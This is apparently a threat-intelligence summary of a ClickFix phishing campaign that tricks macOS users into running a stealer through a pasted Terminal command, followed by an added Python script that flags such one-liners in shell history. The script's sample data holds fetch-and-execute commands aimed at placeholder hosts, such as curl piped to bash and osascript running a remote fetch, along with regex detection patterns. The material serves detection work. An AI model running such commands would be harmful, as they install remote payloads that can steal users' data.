Clickfix on macOS: AppleScript Stealer, Terminal Phishing, and C2 Infrastructure
Aug. 25, 2025, 11:32 a.m.
Description
A sophisticated phishing campaign targeting macOS users employs a technique called Clickfix: fake security prompts and CAPTCHA pages, hosted on domains such as cryptoinfo-news.com to look legitimate, instruct the victim to paste a command into Terminal and run it. That command executes malicious AppleScript, which steals sensitive data including browser profiles, cryptocurrency wallets, and personal files. The stolen data is exfiltrated to command-and-control servers, some of which listen on unusual ports. The campaign's infrastructure spans multiple regions, with several C2 servers hosted in Russia. The analysis uncovered over 50 related servers with similar configurations, pointing to a financially motivated and globally distributed operation.
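The defining trait of Clickfix is a single pasted command that fetches or decodes a payload and hands it straight to an interpreter (osascript or a shell), so one cheap hunting step is to triage shell history or command-line telemetry for that chain. The script below is an added example, not code from the original page or from the campaign analysis it summarizes; the indicator patterns are general assumptions about what such one-liners look like, not the campaign's actual command, which the page does not reproduce, and the history lines are constructed sample data using example.invalid hostnames.

```python
"""Heuristic triage of shell history for ClickFix-style one-liners.

Added example, not code from the original page or the campaign analysis.
The patterns are assumptions about typical ClickFix commands (remote fetch
or decode piped into an interpreter, inline AppleScript, odd C2 ports), not
the campaign's real command. SAMPLE_HISTORY is constructed test data.
"""
import re
from urllib.parse import urlparse

# Tools used to pull the payload from the C2.
FETCH_RE = re.compile(r"\b(curl|wget)\b")
# An interpreter at the start of the line or directly after a pipe.
INTERP_RE = re.compile(r"(?:^|\|)\s*(?:sudo\s+)?(osascript|bash|sh|zsh)\b")
# Decoding stages often inserted between fetch and execution.
DECODE_RE = re.compile(r"\b(base64\s+(-d|--decode|-D)|xxd\s+-r)\b")
URL_RE = re.compile(r"https?://[^\s'\"|;]+")
# Ports a C2 normally blends in on; anything else in a fetched URL stands out.
COMMON_PORTS = {80, 443, 8080, 8443}


def unusual_port(url):
    """Return the URL's explicit port if it is not a common web port, else None."""
    try:
        port = urlparse(url).port
    except ValueError:
        return None
    if port is not None and port not in COMMON_PORTS:
        return port
    return None


def classify(line):
    """Return the reasons (possibly none) a command line looks like a ClickFix payload."""
    reasons = []
    has_fetch = bool(FETCH_RE.search(line))
    has_interp = bool(INTERP_RE.search(line))
    piped = "|" in line
    # fetch ... | interpreter: remote content runs without the user ever seeing a file
    if has_fetch and has_interp and piped:
        reasons.append("remote content piped into an interpreter")
    # osascript -e: the AppleScript stage is supplied inline on the command line
    if re.search(r"osascript\s+-e", line):
        reasons.append("inline AppleScript via osascript -e")
    if DECODE_RE.search(line) and has_interp:
        reasons.append("decoded payload handed to an interpreter")
    for url in URL_RE.findall(line):
        port = unusual_port(url)
        if port is not None:
            reasons.append(f"fetch from unusual port {port}")
    return reasons


def triage(history_lines):
    """Map each suspicious line number (1-based) to its list of reasons."""
    flagged = {}
    for n, line in enumerate(history_lines, 1):
        reasons = classify(line)
        if reasons:
            flagged[n] = reasons
    return flagged


# Constructed sample ~/.zsh_history content (not real captured data).
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL https://example.invalid/verify.sh | bash",              # fetch piped to shell
    "echo 'b3Nhc2NyaXB0' | base64 -d | osascript",                      # decoded into osascript
    "osascript -e 'do shell script \"curl -s http://example.invalid:9001/p | sh\"'",
    "git status",
    "brew install wget",                                                # fetch tool, nothing executed
]

if __name__ == "__main__":
    for n, reasons in triage(SAMPLE_HISTORY).items():
        print(f"line {n}: {SAMPLE_HISTORY[n - 1]}")
        for r in reasons:
            print(f"    - {r}")
```

Run it against a real `~/.zsh_history` or EDR process command lines by feeding the lines to `triage()`; a hit is a starting point for pulling the URL's host and port into infrastructure pivoting, not a verdict, since developers also pipe installers into shells.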
Tags
Date
- Created: Aug. 22, 2025, 5:35 p.m.
- Published: Aug. 22, 2025, 5:35 p.m.
- Modified: Aug. 25, 2025, 11:32 a.m.
Additional Information
- Finance
- Russian Federation